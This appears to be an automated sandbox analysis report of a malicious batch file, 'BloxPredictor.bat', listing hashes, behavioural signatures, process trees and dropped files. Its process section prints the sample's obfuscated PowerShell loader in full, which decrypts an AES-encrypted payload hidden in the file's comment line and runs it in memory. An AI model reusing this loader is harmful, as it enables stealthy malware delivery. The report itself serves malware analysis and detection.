Analysis

max time kernel: 116s
max time network: 45s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted: 03-09-2022 03:15

Static task: static1
Behavioral task: behavioral1
Sample: BloxPredictor.bat
Resource: win7-20220812-en
General

Target: BloxPredictor.bat
Size: 24KB
MD5: 2ce736935920d83e5d55570739ca8c17
SHA1: 9aab2f25403a0fe6921c152f61ed3d2ceacfad49
SHA256: 001c531b29372d4f6c7697ac00a575773470d23c8681d1d5930aa1e4cd860b76
SHA512: c58589dbcf5a23ca2cd9284733db20659b81850a33bc6eddf6379507fb7307a569019373168665fee93c02d42bdd3ee3c42377db7e16405e32f6e7554d8a3de0
SSDEEP: 768:lsh2CrG0Qz6Ee7Z+x4a7eE8xRrQAh+WVqMJzO:BCrGrGE7x4a7eDfrQAh+SJzO
Malware Config
Signatures

Executes dropped EXE (1 IoC)
  Processes (pid, process):
    956   BloxPredictor.bat.exe

Loads dropped DLL (1 IoC)
  Processes (pid, process):
    1520  cmd.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Runs net.exe

Suspicious behavior: EnumeratesProcesses (21 IoCs)
  Processes (pid, process):
    956   BloxPredictor.bat.exe
    868   taskmgr.exe (20 entries)

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  Processes (pid, process):
    868   taskmgr.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes (description, pid, process):
    Token: SeDebugPrivilege   956   BloxPredictor.bat.exe
    Token: SeDebugPrivilege   868   taskmgr.exe

Suspicious use of FindShellTrayWindow (43 IoCs)
  Processes (pid, process):
    692   SndVol.exe (2 entries)
    868   taskmgr.exe (41 entries)

Suspicious use of SendNotifyMessage (45 IoCs)
  Processes (pid, process):
    692   SndVol.exe (4 entries)
    868   taskmgr.exe (41 entries)

Suspicious use of WriteProcessMemory (9 IoCs)
  Processes (description, pid, process, target process):
    PID 1520 wrote to memory of 536   1520  cmd.exe   net.exe                 (3 entries)
    PID 536 wrote to memory of 916    536   net.exe   net1.exe                (3 entries)
    PID 1520 wrote to memory of 956   1520  cmd.exe   BloxPredictor.bat.exe   (3 entries)
Processes

C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\net.exe
    Command line: net file
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 file

  C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat.exe
    Command line: "BloxPredictor.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $utPpZ = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat').Split([Environment]::NewLine);foreach ($rwqec in $utPpZ) { if ($rwqec.StartsWith(':: ')) { $Wboiv = $rwqec.Substring(3); break; }; };$gxVLe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($Wboiv);$GyhDr = New-Object System.Security.Cryptography.AesManaged;$GyhDr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GyhDr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GyhDr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YLrTLbeRJCsrE1rODFNA5EoKHyT/E5XO8ub+oldlmT0=');$GyhDr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WKvnZ2dZQdF2NCy0/rivZA==');$bYWQg = $GyhDr.CreateDecryptor();$gxVLe = $bYWQg.TransformFinalBlock($gxVLe, 0, $gxVLe.Length);$bYWQg.Dispose();$GyhDr.Dispose();$xJivi = New-Object System.IO.MemoryStream(, $gxVLe);$UhQFt = New-Object System.IO.MemoryStream;$RZDSG = New-Object System.IO.Compression.GZipStream($xJivi, [IO.Compression.CompressionMode]::Decompress);$RZDSG.CopyTo($UhQFt);$RZDSG.Dispose();$xJivi.Dispose();$UhQFt.Dispose();$gxVLe = $UhQFt.ToArray();$lwtWe = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($gxVLe);$erSXK = $lwtWe.EntryPoint;$erSXK.Invoke($null, (, [string[]] ('')))
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\SndVol.exe
  Command line: SndVol.exe -f 45876373 24563
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage

C:\Windows\system32\taskmgr.exe
  Command line: "C:\Windows\system32\taskmgr.exe"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Admin\AppData\Local\Temp\BloxPredictor.bat.exe
  Filesize: 462KB
  MD5: 852d67a27e454bd389fa7f02a8cbe23f
  SHA1: 5330fedad485e0e4c23b2abe1075a1f984fde9fc
  SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
  SHA512: 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

\Users\Admin\AppData\Local\Temp\BloxPredictor.bat.exe
  Filesize: 462KB
  MD5: 852d67a27e454bd389fa7f02a8cbe23f
  SHA1: 5330fedad485e0e4c23b2abe1075a1f984fde9fc
  SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
  SHA512: 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Memory dumps (name, filesize):
  memory/536-54-0x0000000000000000-mapping.dmp
  memory/868-67-0x0000000140000000-0x00000001405E8000-memory.dmp   5.9MB
  memory/868-70-0x0000000140000000-0x00000001405E8000-memory.dmp   5.9MB
  memory/868-69-0x0000000140000000-0x00000001405E8000-memory.dmp   5.9MB
  memory/868-68-0x0000000140000000-0x00000001405E8000-memory.dmp   5.9MB
  memory/916-55-0x0000000000000000-mapping.dmp
  memory/956-60-0x000007FEF3410000-0x000007FEF3E33000-memory.dmp   10.1MB
  memory/956-64-0x00000000024CB000-0x00000000024EA000-memory.dmp   124KB
  memory/956-63-0x00000000024C4000-0x00000000024C7000-memory.dmp   12KB
  memory/956-61-0x000007FEF28B0000-0x000007FEF340D000-memory.dmp   11.4MB
  memory/956-62-0x00000000024C4000-0x00000000024C7000-memory.dmp   12KB
  memory/956-59-0x000007FEFB801000-0x000007FEFB803000-memory.dmp   8KB
  memory/956-57-0x0000000000000000-mapping.dmp